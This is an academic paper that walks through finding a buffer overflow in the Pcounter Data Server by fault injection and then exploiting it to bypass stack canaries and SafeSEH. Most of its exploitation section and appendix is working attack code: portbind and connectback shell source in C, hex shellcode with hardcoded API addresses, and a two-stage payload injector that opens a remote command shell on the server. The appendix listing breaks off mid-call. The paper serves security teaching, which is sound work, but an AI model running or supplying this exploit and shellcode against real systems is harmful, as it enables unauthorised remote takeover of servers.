Software Vulnerabilities by Example:
A Fresh Look at the Buffer Overflow Problem---
Bypassing SafeSEH

William B. Kimball (1) and Saverio Perugini (2)

(1) Department of Electrical and Computer Engineering
Air Force Institute of Technology
Wright-Patterson AFB, OH 45433-7765, USA

(2) Department of Computer Science
University of Dayton
300 College Park
Dayton, OH 45469-2160, USA

wkimball@afit.edu, saverio@udayton.edu

Abstract

We demonstrate how software vulnerabilities compromise the security of a computer system. A variety of everyday applications contain vulnerabilities which may lead to arbitrary remote code execution from unauthorized users. Often, a buffer overflow, an error which arises when a computer program tries to store too much data in memory of a fixed size, provides an easy point of entry. We cover both vulnerability discovery and subsequent exploitation to provide a comprehensive, yet succinct overview of a computer security attack. We use a buffer overflow in the Pcounter Data Server as a running example to understand how systems are compromised. Our discussion of discovery is focused on fault injection---a common technique for identifying buffer overflows. Our exploitation method is an example of a control flow hijacking technique specially crafted to bypass Safe Structured Exception Handling (SafeSEH) and stack canaries---both modern software protection mechanisms.

Keywords: Buffer overflows, Exploitation, Fault Injection, Pcounter Data Server, SafeSEH, Vulnerability Discovery.


Introduction

Computer programs can exhibit a myriad of errors, including string-format errors, race conditions, integer overflows, and buffer overflows. Each of these types of errors lends itself to a variety of discovery techniques. For instance, source-code auditing, binary auditing, and fuzzing are common techniques for identifying buffer overflows. Only once these errors are discovered and exploited do they become vulnerabilities [3]. Since the Pcounter Data Server, the system used as a running example in this paper, is a closed-source application, we focus on binary auditing and fuzzing as discovery mechanisms.

Binary auditing is the process of tracing and analyzing the disassembled code of an executable to find insecure assembly code constructs. Fuzzing, on the other hand, is an ad hoc method of discovering vulnerabilities: it looks for segments of code that cannot successfully process every possible external input (from the user or from a remote client) [2]. One approach to fuzzing, called fault injection, involves intentionally supplying a program with unexpected input [2]. However, fault injection, due to its ad hoc nature, cannot detect all vulnerabilities. In this paper we use fault injection to demonstrate the discovery of a buffer overflow present in the Pcounter Data Server and then discuss ways to exploit the vulnerability.
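As a minimal sketch of fault injection, the following C fragment feeds a toy target inputs of increasing length and reports the first length it cannot handle. The target store_balance(), the 16-byte field size, and the helper first_failing_length() are hypothetical stand-ins chosen for illustration; they are not taken from the Pcounter Data Server, and the toy target rejects oversized input rather than actually overflowing.

```c
#include <stddef.h>
#include <string.h>

#define BALANCE_FIELD_SIZE 16  /* hypothetical capacity, not taken from PCNTDATA */

/* Toy stand-in for the code under test: accepts a balance string only if it
   fits the fixed-size field (including the terminating NUL). Returns 0 on
   success and -1 when the input would have overflowed the field. */
int store_balance(const char *input)
{
    char field[BALANCE_FIELD_SIZE];
    size_t len = strlen(input);

    if (len >= sizeof field)
        return -1;               /* a vulnerable target would overflow here */
    memcpy(field, input, len + 1);
    return 0;
}

/* Fault injector: feeds inputs of increasing length (filled with 'A') and
   returns the first length the target fails on, or 0 if none up to max_len. */
size_t first_failing_length(size_t max_len)
{
    char input[512];
    size_t len;

    if (max_len >= sizeof input)
        max_len = sizeof input - 1;

    for (len = 1; len <= max_len; len++) {
        memset(input, 'A', len);
        input[len] = '\0';
        if (store_balance(input) != 0)
            return len;
    }
    return 0;
}
```

On this toy target, first_failing_length(256) returns 16, the smallest length that no longer fits the field together with its terminating null byte. A real fault injector observes crashes or exceptions instead of a return code, which is why a debugger is attached to the server in what follows.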

Discovering a Vulnerability

Overview of Pcontrol

Pcontrol is a server-based, cross-platform printer management tool for Windows and NetWare networks from AND Technologies (see http://www.andtechnologies.com). It comes with the Pcounter Data Server (PCNTDATA) and a client program called WBALANCE, which queries the server, through DCE/RPC (Distributed Computing Environment / Remote Procedure Calls) over NetBIOS, for a user's balance information in string format. Since simulating an RPC session with the server can be a tedious task, we use a debugger to inject the unexpected data into the client, which then forwards it to the server. In our discussion of exploitation below, we write our own program to inject the unexpected data into the client without using a debugger. We also attach a debugger to the server to watch its flow of execution while it processes the unexpected input.

Every time WBALANCE queries the server for balance information, save for the first, it sends the current balance back to the server for processing. We can attempt to identify a buffer overflow in the server by replacing the currently stored balance in WBALANCE with unexpected input before querying the server. The next time WBALANCE queries the server, it will send this unexpected input instead of the reply string previously received from the server. If the server processes the unexpected input incorrectly, for example by overflowing a buffer, a vulnerability may exist. This type of attack was first published in [4].

How to Discover a Buffer Overflow

The unexpected inputs traditionally used for fuzzing are oversized buffers. In what follows we illustrate the process of injecting an oversized buffer by searching for the balance in WBALANCE's address space and replacing it with an oversized buffer. We use OllyDbg, a user-level debugger for MS Windows.

After querying the server for the current balance (see Fig. 1), we search for that balance (in this case "$0.00") in the address space of WBALANCE. Fig. 2 shows that the string $0.00 is stored at address 004101E5h. The current balance is actually stored in multiple locations throughout the address space. Experimentation has demonstrated that the string at this memory location is the only one sent back to the server for processing. Therefore, we are only concerned with the string at address 004101E5h.
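The search step that the debugger performs here can be sketched in a few lines of C. The function below scans a byte buffer for a pattern starting at a given offset, so repeated calls enumerate every copy of the string. The name find_bytes() and its parameters are illustrative assumptions; the sketch operates on an ordinary in-process buffer, not on another process's address space.

```c
#include <stddef.h>
#include <string.h>

/* Returns the offset of the first occurrence of needle in haystack at or
   after position start, or -1 if there is none. */
long find_bytes(const unsigned char *haystack, size_t haystack_len,
                const unsigned char *needle, size_t needle_len,
                size_t start)
{
    size_t i;

    if (needle_len == 0 || needle_len > haystack_len)
        return -1;
    for (i = start; i + needle_len <= haystack_len; i++) {
        if (memcmp(haystack + i, needle, needle_len) == 0)
            return (long)i;
    }
    return -1;
}
```

Because the balance is stored in several places, a caller would resume the search one byte past each hit and then determine experimentally which copy is the one sent to the server.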


Figure 1: Popup box displaying the balance string received from the server. Inquiry initiated by double-clicking on the icon in the taskbar.



Figure 2: Memory dump at address 004101E5h of WBALANCE.EXE with the hex (left) and ASCII (right) representations of the balance string circled.

The next step is to replace the balance at address 004101E5h with an oversized string. Fig. 3 shows how to load 256 bytes with FFh into location 004101E5h. Without auditing the disassembly of the Pcounter Data Server for the maximum buffer size we do not know what qualifies as an oversized buffer. We chose to make the size of the buffer 256 bytes with FFh (as shown in Fig. 4) because this is more than a reasonable size for a balance.


Figure 3: Loading 256 bytes in memory location 004101E5h.



Figure 4: Replacing $0.00 with 256 FFh bytes.

The next time WBALANCE queries the Pcounter Data Server it will send the new buffer created above in Fig. 4. By tracing the execution of the Pcounter Data Server after it receives the 256-byte buffer from the client, we may discover that the server processes the buffer insecurely. Fig. 5 shows that the server did not successfully process the 256-byte string. An exception was thrown when the server tried to read memory location 00000000h.


Figure 5: Access violation when reading 00000000.

Fig. 6 shows the disassembly of PCNTDATA where the exception was thrown. The instruction at address 0040A08Ah compares the byte at address EDI+(EBX*2)+1 against 00h. EBX and EDI (Extended Destination Index) are two of the general-purpose registers used for processing the balance string in memory; they are used in concert to support string copy operations. At the time of execution, EBX was set to 00000000h and EDI was set to FFFFFFFFh, so the computed address FFFFFFFFh+0+1 wrapped around to 00000000h. The server therefore referenced an illegal address, 00000000h, which caused the exception.
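The address arithmetic behind this fault can be checked with a short C sketch. It models a 32-bit x86 effective address as base + index*scale + displacement, truncated to 32 bits. The function name effective_address() is an illustrative assumption, not something taken from PCNTDATA.

```c
#include <stdint.h>

/* 32-bit x86 effective address: base + index*scale + displacement.
   The cast keeps only the low 32 bits, mirroring the CPU's wraparound. */
uint32_t effective_address(uint32_t base, uint32_t index,
                           uint32_t scale, uint32_t disp)
{
    return (uint32_t)(base + index * scale + disp);
}
```

With the register values observed at the exception, effective_address(0xFFFFFFFF, 0, 2, 1) evaluates to 0, which is the address reported in the access violation.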


Figure 6: Disassembly of PCNTDATA starting at address 0040A06Dh.

At this point, our vulnerability discovery has resulted in a denial of service (DoS) against the server. This type of exploit will usually crash the server, leaving it unresponsive to further inquiries. If this happens to the Pcounter Data Server, WBALANCE will not function. Our objective is to attain control over the flow of execution using the memory corruption error we discovered. In other words, we want to transform our DoS attack into a "control flow hijacking" attack.

In Fig. 7, notice that the input we supplied is on the stack and overwrites (i.e., smashes) an exception handler (i.e., a function pointer) on the stack. SEH (structured exception handling) overwriting is a general technique for bypassing software protections, such as stack canaries, which attempt to prevent traditional return address overwrites. In some cases we could use the SEH handler to control execution flow and, thus, execute a malicious payload on the Pcounter Data Server. However, if SafeSEH (another software protection) is in use, further techniques are needed to bypass it. What follows is an example of an application-specific (i.e., specific to the Pcounter Data Server) technique that bypasses both the stack canary and SafeSEH protections.

We need to investigate how the EDI and EBX registers were set at the time the exception occurred to discern whether we can control the flow of execution on the server. We start by tracing the execution of the disassembly (see Fig. 6) at address 0040A071h. The EBP register, another general-purpose register, is set to 00CBFB94h at the time of the exception (see Fig. 5). The EBP register was not modified between addresses 0040A071h and 0040A08Ah. Therefore, the EDI register was set to the DWORD (four bytes) at address 00CBFBA0h. Fig. 7 shows that the four bytes at address 00CBFBA0h are part of the buffer we replaced in the client (see Fig. 4). This explains why the EDI register was set to FFFFFFFFh. We remotely control the value of the EDI register in the Pcounter Data Server by sending an oversized buffer from WBALANCE with the last four bytes set to the value we specify for EDI!


Figure 7: Stack of PCNTDATA at the time the exception was thrown.

The other register we are concerned with at the time the exception is thrown is EBX. The SUB instruction at address 0040A074h subtracts EBX from itself, which simply sets EBX to zero. Next, the byte at address 00CBFBA4h is moved into the low byte of EBX. The byte at this address is always the terminating null byte of the string we supplied to the server. In other words, the low byte of EBX will always be set to zero. The only other instruction that modifies EBX before the exception is LEA (Load Effective Address). Since EBX is always 00000000h when the instruction at address 0040A087h loads it with the address [EBX+EBX*2], EBX remains 00000000h.
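The three steps that touch EBX can be modeled in C to confirm the conclusion. This is only a sketch of the sequence as described in the text; the exact operand forms in the comments and the function name ebx_after_trace() are assumptions, since the disassembly itself appears only in Fig. 6.

```c
#include <stdint.h>

/* Models the instructions that modify EBX before the faulting compare:
     sub ebx, ebx           ; EBX = 0
     mov bl, <stack byte>   ; low byte of EBX = byte read from the stack
     lea ebx, [ebx+ebx*2]   ; EBX = EBX * 3
   stack_byte is the byte at 00CBFBA4h, which the text says is always the
   string's terminating null byte. */
uint32_t ebx_after_trace(uint8_t stack_byte)
{
    uint32_t ebx = 0;                          /* sub ebx, ebx */
    ebx = (ebx & 0xFFFFFF00u) | stack_byte;    /* mov bl, ...  */
    ebx = (uint32_t)(ebx + ebx * 2u);          /* lea ebx, ... */
    return ebx;
}
```

For the null terminator, ebx_after_trace(0) is 0; any other byte would simply be tripled, which shows that the outcome depends only on that one stack byte.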

The CALL DWORD PTR DS:[EDI+EBX*2+2] at address 0040A097h is used to change the next address of execution by updating the EIP register (i.e., instruction pointer). Since we have control over the value of the EDI register, and the EBX register will always be zero, we also have control of the EIP register and can change the flow of execution on the server by supplying an address for the EDI register from WBALANCE! This concludes how to discover a buffer overflow in the Pcounter Data Server which leads to remote code execution. The following section illustrates how we can remotely execute shellcode on the server.

Exploiting a Vulnerability

There are no standard methods to write an exploit, a computer program which takes advantage of a bug. The code usually needs to be written to target a specific hardware or software platform [1]. Moreover, we must consider other constraints such as payload size and filters. Before the buffer sent to the Pcounter Data Server gets insecurely processed, it is modified by the tolower() function, which converts all bytes from 41h-5Ah to 61h-7Ah. Because of this filter we must write all of our shellcode without using 41h through 7Ah [2]. "Writing an exploit for certain buffer overflow vulnerabilities can be problematic because of the filters that may be in place; for example, a vulnerable program may allow only alphanumeric characters from A to Z (41h to 5Ah), a to z (61h to 7Ah) and 0 to 9 (30h to 39h)" [2].
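To make the effect of such a filter concrete, the following C sketch applies the 41h-5Ah to 61h-7Ah mapping described above and counts how many bytes of a buffer it would alter. The helpers ascii_tolower() and bytes_altered_by_filter() are hypothetical names; the mapping is written out by hand, an assumption made so that the result does not depend on the C locale used by the real tolower().

```c
#include <stddef.h>

/* ASCII-only lowercase conversion: bytes 41h-5Ah map to 61h-7Ah,
   every other byte value passes through unchanged. */
unsigned char ascii_tolower(unsigned char b)
{
    return (b >= 0x41 && b <= 0x5A) ? (unsigned char)(b + 0x20) : b;
}

/* Counts how many bytes of buf the filter would alter. */
size_t bytes_altered_by_filter(const unsigned char *buf, size_t len)
{
    size_t i, altered = 0;

    for (i = 0; i < len; i++) {
        if (ascii_tolower(buf[i]) != buf[i])
            altered++;
    }
    return altered;
}
```

A buffer for which bytes_altered_by_filter() returns zero reaches the vulnerable code byte for byte as it was sent; any other buffer is changed in transit.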

The payload is the portion of an exploit which is executed because of a vulnerability. It is often malicious and intended to perform a specific function such as spawning a shell or adding administrator accounts to a system. The most popular type of payload, called shellcode, involves creating a command shell. It is easy to create a command shell using C in the Windows programming environment. For instance, call the Windows API function CreateProcess() as shown in Table 1.

Table 1: C code to spawn a shell.
#include <windows.h>

void main() {
   STARTUPINFO si;
   PROCESS_INFORMATION pi;
 
   memset (&si, 0, sizeof (STARTUPINFO));
   memset (&pi, 0, sizeof (PROCESS_INFORMATION));

   si.cb = sizeof (STARTUPINFO);

   CreateProcess (0, "cmd", 0, 0, 0, 0, 0, 0, &si, &pi);
}

While this code spawns a shell on the local system, we cannot interact with it remotely. The common methods of interacting with a shell remotely use portbind shellcode or connectback shellcode. Portbind shellcode spawns a shell with its standard input and output redirected to a listening socket. Similarly, connectback shellcode spawns a shell with its standard input and output bound to a socket, but unlike portbind shellcode, it connects back to another socket listening on the client rather than listening for incoming connections. Executing connectback shellcode is more common when a firewall resides between the client and server. Table 2 provides an example of portbind shellcode and Table 3 presents an example of connectback shellcode.

Table 2: Sample portbind shellcode in C.
#include <windows.h>
#include <winsock2.h>
#define PORT 5555

#pragma comment (lib, "ws2_32.lib")

void main() {
   STARTUPINFO si;
   PROCESS_INFORMATION pi;
   WSADATA wsdata;
   SOCKET listSock, acceptSock;
   SOCKADDR_IN sa, saa;
   int sizeSOCKADDR = sizeof (SOCKADDR);
 
   WSAStartup (MAKEWORD (2, 2), &wsdata);

   sa.sin_addr.s_addr = INADDR_ANY;
   sa.sin_port = htons (PORT);
   sa.sin_family = AF_INET;

   listSock = WSASocket (2, 1, 0, 0, 0, 0);

   bind (listSock, (SOCKADDR*) &sa, sizeof (SOCKADDR));

   listen (listSock, 1);

   acceptSock = accept (listSock, (SOCKADDR*) &saa, &sizeSOCKADDR);

   memset (&si, 0, sizeof (STARTUPINFO));
   memset (&pi, 0, sizeof (PROCESS_INFORMATION));

   si.cb = sizeof (STARTUPINFO);
   si.dwFlags = STARTF_USESTDHANDLES;
   si.hStdInput = (HANDLE) acceptSock;
   si.hStdOutput = (HANDLE) acceptSock;
   si.hStdError = (HANDLE) acceptSock;

   CreateProcess (0, "cmd", 0, 0, 1, CREATE_NEW_CONSOLE, 0, 0, &si, &pi);
}


Table 3: Sample connectback shellcode in C.
#include <windows.h>
#include <winsock2.h>
#define PORT 5555
#define IP "127.0.0.1"

#pragma comment (lib, "ws2_32.lib")

void main() {
   STARTUPINFO si;
   PROCESS_INFORMATION pi;
   WSADATA wsdata;
   SOCKET sock;
   SOCKADDR_IN sa;
 
   WSAStartup (MAKEWORD (2, 2), &wsdata);

   sa.sin_addr.s_addr = inet_addr (IP);
   sa.sin_port = htons (PORT);
   sa.sin_family = AF_INET;

   sock = WSASocket (2, 1, 0, 0, 0, 0);

   connect (sock, (SOCKADDR*) &sa, sizeof (SOCKADDR));

   memset (&si, 0, sizeof (STARTUPINFO));
   memset (&pi, 0, sizeof (PROCESS_INFORMATION));

   si.cb = sizeof (STARTUPINFO);
   si.dwFlags = STARTF_USESTDHANDLES;
   si.hStdInput = (HANDLE) sock;
   si.hStdOutput = (HANDLE) sock;
   si.hStdError = (HANDLE) sock;

   CreateProcess (0, "cmd", 0, 0, 1, CREATE_NEW_CONSOLE, 0, 0, &si, &pi);
}

Fig. 7 shows only 80 bytes of the buffer sent to the server stored on the stack at the time that we control the instruction pointer. Therefore, only 76 bytes are available for shellcode; recall that four bytes are required for setting the EDI register. Due to this size limitation, we use connectback shellcode, which requires less memory than the portbind shellcode. We must translate the connectback shellcode (Table 3) to assembly and then into hexadecimal form because we can only replace the $0.00 string with ASCII, Unicode, or hex (cf. Fig. 3).

Since it is safe to assume that the Windows Sockets Library (WinSock) is initialized on the server, we can omit the call to WSAStartup() (which initializes WinSock) in our shellcode. To complete the shellcode, we call WSASocket(), connect(), and CreateProcess().

Most Windows API functions which process characters are actually two functions: one appended with an A (for ANSI) and the other appended with a W (for wide character, i.e., Unicode). Usually the compiler selects which function to link depending on the type of character format used. The functions WSASocketA() and connect() are imported from ws2_32.dll and CreateProcessA() is imported from kernel32.dll. The addresses of these three functions are specific to each Windows version and service pack. Here, we hardcode the addresses for these functions in our shellcode to run on Windows XP SP2. Writing shellcode to run on any Windows OS and service pack is beyond the scope of this paper and requires more memory than is available for this exploit. Stuttard researched how to write small, OS-independent shellcode, which still requires 191 bytes for portbind shellcode [5]. Because we only have 76 bytes, we cannot use the techniques in [5]. The export address used to call each function is 71AB8769h for WSASocketA(), 71AB406Ah for connect() and 7C802367h for CreateProcessA(). Table 4 shows the C, Intel assembly, and hexadecimal equivalents for calling each of the functions needed to build the shellcode.


Table 4: C, Intel assembly, and hexadecimal equivalents.
Columns, listed one after another for each row: C | Intel Assembly | Hexadecimal
sock = WSASocket (AF_INET, SOCK_STREAM, 0, 0, 0, 0);

/* sock will be stored in the eax register
   when the call to WSASocket() returns */
xor	eax, eax
push	eax
push	eax
push	eax
push	eax
inc	eax
push	eax
inc	eax
push	eax
mov	ebx, 0x71ab8769
call	ebx
31 C0
50
50
50
50
40
50
40
50
BB 69 87 AB 71
FF D3
SOCKADDR_IN sa;

sa.sin_addr.s_addr = inet_addr ("127.1.1.1");
sa.sin_port             = htons (5555);
sa.sin_family         = AF_INET;

connect (sock, (SOCKADDR*) &sa, sizeof (SOCKADDR));
mov	ebx, 0x0101017f
push	ebx
mov	ebx, 0x4ceafffd
not	ebx
push	ebx
mov	ecx, esp
mov	esi, eax
push	0x10
push	ecx
push	eax
mov	ebx, 0x71ab406a
call	ebx
BB 7F 01 01 01
53
BB FD FF EA 4C
F7 D3
53
89 E1
89 C6
6A 10
51
50
BB 6A 40 AB 71
FF D3
memset (&si, 0, sizeof (STARTUPINFO));
memset (&pi, 0, sizeof (PROCESS_INFORMATION));

si.cb		= sizeof(STARTUPINFO);
si.dwFlags		= STARTF_USESTDHANDLES;
si.hStdInput	= (HANDLE)sock;
si.hStdOutput	= (HANDLE)sock;
si.hStdError	= (HANDLE)sock;

CreateProcess(0, "CMD", 0, 0, 1, CREATE_NEW_CONSOLE, 0, 0, &si, &pi);
xor	ecx, ecx
mov	cl, 0x54
sub	esp, ecx
mov	edi, esp
push	edi
xor	eax, eax
rep	stosb
pop	edi
mov	byte [edi], 0x44
inc	byte [edi+0x2d]
push	edi
mov	eax, esi
lea	edi, [edi+0x38]
stosd
stosd
stosd
pop	edi
xor	eax, eax
lea	esi, [edi+0x44]
push	esi
push	edi
push	eax
push	eax
push	eax
inc	eax
push	eax
dec	eax
push	eax
push	eax
mov 	ecx, 'addr of cmd'
not	ecx
push	ecx
push	eax
mov 	ecx, 0x7c802367
call	ecx               	
        db"CMD",0
31 C9
B1 54
29 CC
89 E7
57
31 C0
F3 AA
5F
C6 07 44
FE 47 2D
57
89 F0
8D 7F 38
AB
AB
AB
5F
31 C0
8D 77 44
56
57
50
50
50
40
50
48
50
50
B9 'addr of cmd'
F7 D1
51
50
B9 67 23 80 7C
FF D1
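The constant 0x4ceafffd that is loaded and then inverted with NOT in the connect() row can be decoded with a short C sketch. It inverts the stored value and reads the resulting DWORD as it would lie in little-endian memory, where the first two bytes are sin_family and the last two are the port in network byte order. The type family_port and the function decode_family_port() are hypothetical names introduced for illustration. The reason for storing the inverted value is not stated in the text; a plausible assumption is that it keeps zero bytes out of the instruction stream.

```c
#include <stdint.h>

typedef struct {
    uint16_t family;   /* sin_family, host order */
    uint16_t port;     /* port number, host order */
} family_port;

/* Inverts the stored constant, then interprets the DWORD as the first four
   bytes of a SOCKADDR_IN in little-endian memory: bytes 0-1 hold sin_family,
   bytes 2-3 hold the port in network (big-endian) byte order. */
family_port decode_family_port(uint32_t stored)
{
    uint32_t dword = (uint32_t)~stored;
    family_port fp;

    fp.family = (uint16_t)(dword & 0xFFFFu);
    /* memory byte 2 is bits 16-23 (port high byte), byte 3 is bits 24-31 */
    fp.port = (uint16_t)((((dword >> 16) & 0xFFu) << 8) |
                         ((dword >> 24) & 0xFFu));
    return fp;
}
```

For 0x4ceafffd the inverted DWORD is 0xB3150002, which decodes to family 2 (AF_INET) and port 5555, matching the C column of the table.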

The hexadecimal equivalents shown in Table 4 require 106 bytes. Since we are limited to 76 bytes, we must decrease the size of our shellcode. We apply a two-stage shellcode attack where the first-stage shellcode sent to the server only calls socket(), connect(), and recv() and the second-stage shellcode spawns the shell. The first-stage shellcode only requires 63 bytes of code (see Table 5). The second-stage shellcode (i.e., the actual payload) is sent to the server when it connects back to the client. After recv() returns the first-stage shellcode should immediately call the address of the buffer supplied to recv() to execute the second-stage payload.


Table 5: Two-stage C, Intel assembly, and hexadecimal equivalents.
Columns, listed one after another for each row: C | Intel Assembly | Hexadecimal
sock = socket (AF_INET, SOCK_STREAM, IPPROTO_TCP);

/* sock will be stored in the eax register
   when the call to socket() returns */

xor	eax, eax
push	eax
inc	eax
push	eax
inc	eax
push	eax
mov	ebx, 0x71AB3B91
call	ebx
31 C0
50
40
50
40
50
BB 91 3B AB 71
FF D3
SOCKADDR_IN sa;

sa.sin_addr.s_addr = inet_addr ("127.1.1.1");
sa.sin_port             = htons (5555);
sa.sin_family         = AF_INET;

connect (sock, (SOCKADDR*) &sa, sizeof(SOCKADDR));
mov	ebx, 0x0101017f
push	ebx
mov	ebx, 0x4ceafffd
not	ebx
push	ebx
mov	ecx, esp
mov	esi, eax
push	0x10
push	ecx
push	eax
mov	ebx, 0x71ab406a
call	ebx
BB 7F 01 01 01
53
BB FD FF EA 4C
F7 D3
53
89 E1
89 C6
6A 10
51
50
BB 6A 40 AB 71
FF D3
recv (sock, 'addr of foo()',
   'use address of recv as size to decrease shellcode size', 0);
foo();

/* using the address of recv as the buffer size
   helps decrease the shellcode size; it is safe
   to assume that the size of the buffer sent to
   the server will not be greater than 0x71AB615A,
   which is 1,907,056,986 bytes! */
xor	edx, edx
push	edx
mov	ecx, 'addr of foo()'
mov	ebx, 0x71AB615A
push	ebx
push	ecx
push	eax
call	ebx
call	ecx
31 D2
52
B9 'addr of foo()'
BB 5A 61 AB 71
50
53
50
FF D3
FF D1

Tables 4 and 5 contain the code snippets we need to build our two-stage shellcode. While it is possible to manually replace the memory shown in Fig. 4 with our shellcode, doing so every time we exploit the server is not practical. Instead we build an application to inject the payload automatically. In the Appendix, we provide the source code for the Pcounter exploit payload injector (i.e., pei; cf. Fig. 11), which automates the process of exploiting the server without simulating an authentic RPC session to the Pcounter Data Server. The program accepts a process id (PID), two IP addresses, and two port numbers. There are separate IP addresses and ports for the two stages of the attack; together they represent the addresses and ports used to connect back from the server. The PID passed to pei must be that of WBALANCE. In the example shown in Figs. 11 and 12, pei listens on port 4444 for the first-stage payload to connect back to it. pei automatically sends the second-stage shellcode to the server after it receives a connection. Netcat or another program should listen on port 5555 for the second-stage payload to connect back with the final remote shell.




Figure 11: Exploiting the Pcounter Data Server



Figure 12: Netcat listening on port 5555.

Conclusion

We have demonstrated how to discover a vulnerability in the Pcounter Data Server using fault injection and write an exploit against it leading to remote-code execution. New techniques, in addition to stack canaries and SafeSEH, continue to be developed to protect applications while attackers continue to develop bypassing techniques to exploit those same applications. Until formal methods improve to be able to prove the correctness of complex software, vulnerabilities will continue to exist, and computer systems will continue to be compromised.

References

About the Authors

William B. Kimball is a Ph.D. student in the Department of Electrical and Computer Engineering at the Air Force Institute of Technology in Dayton, OH. His research interests are program analysis, symbolic model checking, and formal verification. Kimball has a B.S. in Computer Science from the University of Dayton (2006). He can be reached at wkimball@afit.edu.

Saverio Perugini is an Associate Professor in the Department of Computer Science at the University of Dayton. His research interests are programming languages and interactive information retrieval. Perugini regularly teaches courses in operating systems, systems programming, and programming languages. He can be reached at saverio@udayton.edu.

Appendix

#include <stdlib.h>
#include <stdio.h>
#include <winsock2.h>

#pragma comment(lib, "ws2_32.lib")

//************************STAGE 1 shellcode****************************

char s1_shellcode[] =
   "FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
   "FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
   "\x53"                  //push   ebx
   "\x43"                  //inc    ebx
   "\x53"                  //push   ebx
   "\x43"                  //inc    ebx
   "\x53"                  //push   ebx
   "\xB8\x60\xc4\x54\x8e"  //mov    eax, 0x8e54c460
   "\xf7\xd0"              //not    eax               ;0x71ab3b91
   "\x83\xe8\x0e"          //sub    eax, e
   "\xff\xd0"              //call   eax               ;socket
   "\xbb\x7f\x01\x01\x01"  //mov    ebx, 0x0101017f   ;ip address
   "\x53"                  //push   ebx
   "\xbb\xfd\xff\xee\xa3"  //mov    ebx, 0xa3eefffd   ;port
   "\xf7\xd3"              //not    ebx               ;0x5c110002
   "\x53"                  //push   ebx
   "\x83\xc6\x10"          //add    esi, 0x10
   "\x89\xe3"              //mov    ebx, esp
   "\x56"                  //push   esi
   "\x53"                  //push   ebx
   "\x89\xc7"              //mov    edi, eax
   "\x50"                  //push   eax
   "\xbb\x95\xbf\x54\x8e"  //mov    ebx, 0x8e54bf95
   "\xf7\xd3"              //not    ebx               ;0x71ab406a
   "\xff\xd3"              //call   ebx               ;connect
   "\x31\xd2"              //xor    edx, edx
   "\x52"                  //push   edx
   "\xb9\xa5\x9e\x54\x8e"  //mov    ecx, 0x8e549ea5   ;recv and buffer size
   "\xf7\xd1"              //not    ecx               ;0x71ab615a
   "\x57"                  //push   edi            
   "\xbb\x5f\x04\x34\xff"  //mov    ebx, 0xff78045f
   "\xf7\xd3"              //not    ebx               ;0x00b8fba0
   "\x53"                  //push   ebx
   "\x57"                  //push   edi
   "\xff\xd1"              //call   ecx               ;recv
   "\xff\xd3"              //call   ebx               ;stage 2 s2_shellcode

//*********************************************************************
   "\xeb\xb4"              //jmp to beginning of s2_shellcode
   "\x9e\xfb\xcb\x00";     //EDI (EDI + 2 points to value for EIP in s1_shellcode)

//************************STAGE 2 shellcode****************************

unsigned char s2_shellcode[] =
   "\x31\xC0"              //xor    eax, eax
   "\x50"                  //push   eax
   "\x50"                  //push   eax
   "\x50"                  //push   eax
   "\x50"                  //push   eax
   "\x40"                  //inc    eax
   "\x50"                  //push   eax
   "\x40"                  //inc    eax
   "\x50"                  //push   eax
   "\xBB\x69\x87\xAB\x71"  //mov    ebx, 0x71ab8769
   "\xFF\xD3"              //call   ebx
   "\xBB\x7F\x01\x01\x01"  //mov    ebx, 0x0101017f
   "\x53"                  //push   ebx
   "\xbb\xfd\xff\xea\x4c"  //mov    ebx, 0x4ceafffd
   "\xf7\xd3"              //not    ebx
   "\x53"                  //push   ebx
   "\x89\xe1"              //mov    ecx, esp
   "\x89\xc6"              //mov    esi, eax
   "\x6A\x10"              //push   0x10
   "\x51"                  //push   ecx
   "\x50"                  //push   eax
   "\xBB\x6A\x40\xAB\x71"  //mov    ebx, 0x71ab406a
   "\xFF\xD3"              //call   ebx
   "\x31\xC9"              //xor    ecx, ecx
   "\xB1\x54"              //mov    cl, 0x54
   "\x29\xCC"              //sub    esp, ecx
   "\x89\xE7"              //mov    edi, esp
   "\x57"                  //push   edi
   "\x31\xC0"              //xor    eax, eax
   "\xF3\xAA"              //rep    stosb
   "\x5F"                  //pop    edi
   "\xC6\x07\x44"          //mov    byte [edi], 0x44
   "\xFE\x47\x2D"          //inc    byte [edi+0x2d]
   "\x57"                  //push   edi
   "\x89\xF0"              //mov    eax, esi
   "\x8D\x7F\x38"          //lea    edi, [edi+0x38]
   "\xAB"                  //stosd
   "\xAB"                  //stosd
   "\xAB"                  //stosd
   "\x5F"                  //pop    edi
   "\x31\xC0"              //xor    eax, eax
   "\x8D\x77\x44"          //lea    esi, [edi+0x44]
   "\x56"                  //push   esi
   "\x57"                  //push   edi
   "\x50"                  //push   eax
   "\x50"                  //push   eax
   "\x50"                  //push   eax
   "\x40"                  //inc    eax
   "\x50"                  //push   eax
   "\x48"                  //dec    eax
   "\x50"                  //push   eax
   "\x50"                  //push   eax
   "\xb9\xf2\x03\x34\xFF"  //mov    ecx, 0xff7803f2
   "\xf7\xd1"              //not    ecx
   "\x51"                  //push   ecx
   "\x50"                  //push   eax
   "\xb9\x67\x23\x80\x7c"  //mov    ecx, 0x7c802367
   "\xff\xd1"              //call   ecx
   "\xff\xff"
   "CMD\x00";

//*********************************************************************

int main (int argc, char** argv) {

   HANDLE handle;
   SOCKADDR_IN sa_cb, service;
   WSADATA ws;
   SOCKET ListenSocket, AcceptSocket;

   if (argc != 6) {
      printf("usage: <pid> <s1 ip> <s1 port> <s2 ip> <s2 port>\n");
      exit(1);
   }

   // setup WinSock
   WSAStartup(MAKEWORD(2, 2), &ws);

   if ((handle = OpenProcess(PROCESS_VM_OPERATION|PROCESS_VM_WRITE , 1,
      atoi(argv[1]))) == NULL) {
         printf("Failed to open process: %d\n", atoi(argv[1]));
         exit(1);
      }

   //set stage 1 port in s1_shellcode
   s1_shellcode[128] = (BYTE)~(atoi(argv[3])>>8);
   s1_shellcode[129] = (BYTE)~atoi(argv[3]);

   //set stage 1 ip address in s1_shellcode
   sa_cb.sin_addr.s_addr = inet_addr(argv[2]);
   s1_shellcode[120] = (BYTE)sa_cb.sin_addr.S_un.S_un_b.s_b1;
   s1_shellcode[121] = (BYTE)sa_cb.sin_addr.S_un.S_un_b.s_b2;
   s1_shellcode[122] = (BYTE)sa_cb.sin_addr.S_un.S_un_b.s_b3;
   s1_shellcode[123] = (BYTE)sa_cb.sin_addr.S_un.S_un_b.s_b4;

   if (!WriteProcessMemory(handle, (LPVOID)0x4101EA, s1_shellcode,
